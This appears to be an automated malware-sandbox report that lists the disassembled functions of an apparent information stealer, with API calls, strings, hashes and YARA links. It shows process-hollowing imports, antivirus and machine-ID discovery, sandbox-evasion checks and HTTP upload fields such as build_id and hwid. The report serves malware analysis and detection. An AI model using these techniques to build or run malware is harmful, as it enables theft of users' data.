Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34

Function 00410DDB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000200,00000000), ref: 00410E57

Strings

/ , xrefs: 00410E73

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: /
API String ID: 2299586839-4001269591
Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54

Function 00410D2E Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785

Function 00410FBA Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00410FD4

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44

Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

Function 00405482 Relevance: 35.6, APIs: 4, Strings: 16, Instructions: 573
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

_memmove.LIBCMT ref: 00405CB4
_memmove.LIBCMT ref: 00405CD6
_memmove.LIBCMT ref: 00405D05
HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D

Strings

file_data, xrefs: 00405C09
------, xrefs: 00405B5D
", xrefs: 0040581B
--, xrefs: 00405600
", xrefs: 0040597B
ERROR, xrefs: 00405F2F
------, xrefs: 0040589D
------, xrefs: 004059FF
", xrefs: 00405AD8
", xrefs: 00405C35
------, xrefs: 00405605
------, xrefs: 0040573C
ERROR, xrefs: 00405D79
b26735cbe8ca9e75712ffe3aa40c4a60, xrefs: 004059A7
block, xrefs: 00405E30
build_id, xrefs: 0040594F

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memmove$CrackHttpInternetRequestSend
String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$b26735cbe8ca9e75712ffe3aa40c4a60$block$build_id$file_data
API String ID: 4955943-3708530033
Opcode ID: a9f9a16d7ed9cb6f6dffaab1b80b3fa30c09e432f7c44dde5ace5f3de2395ab5
Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
Opcode Fuzzy Hash: a9f9a16d7ed9cb6f6dffaab1b80b3fa30c09e432f7c44dde5ace5f3de2395ab5
Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00401696
wsprintfW.USER32 ref: 004016BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,?,00000100,00000000), ref: 004016E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
RtlAllocateHeap.NTDLL(00000000), ref: 00401705
_time64.MSVCRT ref: 0040170E
srand.MSVCRT ref: 00401715
rand.MSVCRT ref: 0040171E
_memset.LIBCMT ref: 0040172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
_memset.LIBCMT ref: 00401763
CloseHandle.KERNEL32(?), ref: 00401771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
_memset.LIBCMT ref: 004017BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
RtlFreeHeap.NTDLL(00000000), ref: 004017CF
CloseHandle.KERNEL32(?), ref: 004017DB

Strings

delays.tmp, xrefs: 004016A4
%s%s, xrefs: 004016B6

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28

Function 00418950 Relevance: 28.5, APIs: 5, Strings: 11, Instructions: 518
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(004172CA), ref: 00418DD5
LoadLibraryA.KERNEL32 ref: 00418E08
LoadLibraryA.KERNEL32 ref: 00418E3B
LoadLibraryA.KERNEL32 ref: 00418E4C
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418E5C

Strings

WriteProcessMemory, xrefs: 00418D9E
ReadProcessMemory, xrefs: 00418D5C
InternetSetOptionA, xrefs: 0041932A
SymMatchString, xrefs: 00419429
GetThreadContext, xrefs: 00418D46
ResumeThread, xrefs: 00418D88
CreateProcessA, xrefs: 00418D30
VirtualAllocEx, xrefs: 00418D72
HttpQueryInfoA, xrefs: 00419314
dbghelp.dll, xrefs: 00418E52
SetThreadContext, xrefs: 00418DB4

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 1029625771-2740034357
Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

Function 00405F39 Relevance: 25.0, APIs: 4, Strings: 10, Instructions: 466
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

_memmove.LIBCMT ref: 00406639
_memmove.LIBCMT ref: 00406662
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
InternetCloseHandle.WININET(00000000), ref: 004066ED

Strings

mode, xrefs: 00406575
build_id, xrefs: 00406419
------, xrefs: 00406206
------, xrefs: 00406367
", xrefs: 004062E5
------, xrefs: 00406080
", xrefs: 00406445
b26735cbe8ca9e75712ffe3aa40c4a60, xrefs: 00406471
------, xrefs: 004064C9
", xrefs: 004065A1

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$_memmove$CloseCrackFileHandleRead
String ID: "$"$"$------$------$------$------$b26735cbe8ca9e75712ffe3aa40c4a60$build_id$mode
API String ID: 510018941-2549312558
Opcode ID: 69703cf7e32ee3cc6108c3b22d46cb8a654651e0a7b81b51028067c3f9b1e1af
Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
Opcode Fuzzy Hash: 69703cf7e32ee3cc6108c3b22d46cb8a654651e0a7b81b51028067c3f9b1e1af
Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 0041199E
CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
VariantInit.OLEAUT32(?), ref: 00411A5D
VariantClear.OLEAUT32(?), ref: 00411A8B

Strings

displayName, xrefs: 00411A6F
root\SecurityCenter2, xrefs: 004119F0
Select * From AntiVirusProduct, xrefs: 00411A23
Unknown, xrefs: 00411A99
WQL, xrefs: 00411A28
Unknown, xrefs: 00411AB4
Unknown, xrefs: 00411AA0

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$BlanketClearCreateH_prolog3_catchInitInstanceProxySecurity
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 3060130021-315474579
Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68

Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 004012A7
_memset.LIBCMT ref: 004012B6
lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

ExitProcess.KERNEL32 ref: 004013E3

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
String ID:
API String ID: 2891980384-0
Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98

Function 00404B2E Relevance: 17.9, APIs: 2, Strings: 8, Instructions: 378
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
InternetCloseHandle.WININET(00000000), ref: 00405177

Strings

8wA, xrefs: 00405222
", xrefs: 00404ED9
------, xrefs: 00404F5B
build_id, xrefs: 0040500D
------, xrefs: 00404C75
", xrefs: 00405039
------, xrefs: 00404DFB
hwid, xrefs: 00404EAD

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseCrackFileHandleRead
String ID: "$"$------$------$------$8wA$build_id$hwid
API String ID: 1110209605-858375883
Opcode ID: efd3ad31af1dde764d0696b5195e0c6fd6f39412fd84f2ab020c7fb7797c676d
Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
Opcode Fuzzy Hash: efd3ad31af1dde764d0696b5195e0c6fd6f39412fd84f2ab020c7fb7797c676d
Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8

Function 00417041 Relevance: 16.8, APIs: 1, Strings: 8, Instructions: 1029
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(?,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8

CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A

Part of subcall function 004139C2: strtok_s.MSVCRT ref: 004139F3

Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A

Strings

cowod., xrefs: 00417E7B
hopto, xrefs: 00417E9F
.exe, xrefs: 00417549
org, xrefs: 00417EE7
http://, xrefs: 00417E57
b26735cbe8ca9e75712ffe3aa40c4a60, xrefs: 0041770C
_DEBUG.zip, xrefs: 00417F35
.exe, xrefs: 00417E04

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$CreateHeap$AllocDirectoryFirstH_prolog3_catch_NameProcessProcess32SnapshotToolhelp32User
String ID: .exe$.exe$_DEBUG.zip$b26735cbe8ca9e75712ffe3aa40c4a60$cowod.$hopto$http://$org
API String ID: 2072274150-1499729979
Opcode ID: aad260dc88e32554c7ca58c5124fbaaa84584415b86235e9da2d33aac3934208
Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
Opcode Fuzzy Hash: aad260dc88e32554c7ca58c5124fbaaa84584415b86235e9da2d33aac3934208
Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B

Function 00411203 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 155
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC

Strings

?, xrefs: 00411263
- , xrefs: 004113E6
%s\%s, xrefs: 004112D7

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValue$Enum
String ID: - $%s\%s$?
API String ID: 2712010499-3278919252
Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54

Function 004115D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00411607
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
CharToOemA.USER32(?,?), ref: 0041166B

Strings

MachineGuid, xrefs: 00411640
SOFTWARE\Microsoft\Cryptography, xrefs: 0041161C

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2355623204-1211650757
Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14

Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041175E
CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
SysAllocString.OLEAUT32(?), ref: 0041178E
_wtoi64.MSVCRT ref: 004117C1
SysFreeString.OLEAUT32(?), ref: 004117DA
SysFreeString.OLEAUT32(00000000), ref: 004117E1

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59

Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
_memset.LIBCMT ref: 004010D0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
ExitProcess.KERNEL32 ref: 00401112

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C

Function 004109A2 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

Strings

:\, xrefs: 00410A06
QuBi, xrefs: 00410A27
C, xrefs: 004109DF
wA, xrefs: 00410B21

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentInformationProfileVolume_memsetmallocstrncpy
String ID: wA$:\$C$QuBi
API String ID: 1802918048-1441494722
Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54

Function 00404AB6 Relevance: 6.0, APIs: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternet
String ID:
API String ID: 1381609488-0
Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94

Function 00405237 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

RtlAllocateHeap.NTDLL(00000000), ref: 00405285

Strings

GET, xrefs: 00405325
\xA, xrefs: 00405250, 00405457, 0040539E

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateCrackHeapInternet
String ID: GET$\xA
API String ID: 1086229106-571280152
Opcode ID: baa2dc263a1b6845e1dbba7907f855f2c15fc2d89a61f68a7661ccb89eda7454
Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
